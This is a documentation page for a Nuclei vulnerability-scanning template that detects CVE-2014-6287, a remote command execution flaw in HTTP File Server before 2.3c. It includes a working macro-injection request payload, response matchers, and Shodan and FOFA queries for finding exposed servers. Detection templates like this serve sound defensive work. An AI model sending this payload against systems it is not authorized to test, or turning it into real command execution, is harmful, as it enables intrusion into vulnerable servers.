Skip to content
Nuclei Templates

HTTP File Server <2.3c - Remote Command Execution

ID: CVE-2014-6287

Severity: critical

Author: j4vaovo

Tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto

Description

Section titled “Description”

HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

YAML Source

Section titled “YAML Source”
id: 'CVE-2014-6287'


info:
  name: HTTP File Server <2.3c - Remote Command Execution
  author: j4vaovo
  severity: critical
  description: |
    HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
    - http://www.kb.cert.org/vuls/id/251276
    - http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html
    - https://github.com/rapid7/metasploit-framework/pull/3793
    - https://nvd.nist.gov/vuln/detail/CVE-2014-6287
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: 'CVE-2014-6287'
    cwe-id: CWE-94
    epss-score: 0.97341
    epss-percentile: 0.99889
    cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: rejetto
    product: http_file_server
    shodan-query: http.favicon.hash:2124459909
    fofa-query: icon_hash=2124459909
  tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto
variables:
  str1: '{{rand_base(6)}}'
  str2: 'CVE-2014-6287'


http:
  - method: GET
    path:
      - '{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}'


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>HFS /</title>'


      - type: word
        part: header
        words:
          - 'Set-Cookie: {{str1}}={{str2}};'
          - 'text/html'
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a004730450221009510c87b733fb396586f1226df5f3cd52800af3e41b296a6ab0a5e834809f7c402200e49756f0fd381f284e414f27aab74a90b0ca96dc8a517d9016253666e84b655:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-6287.yaml"

View on Github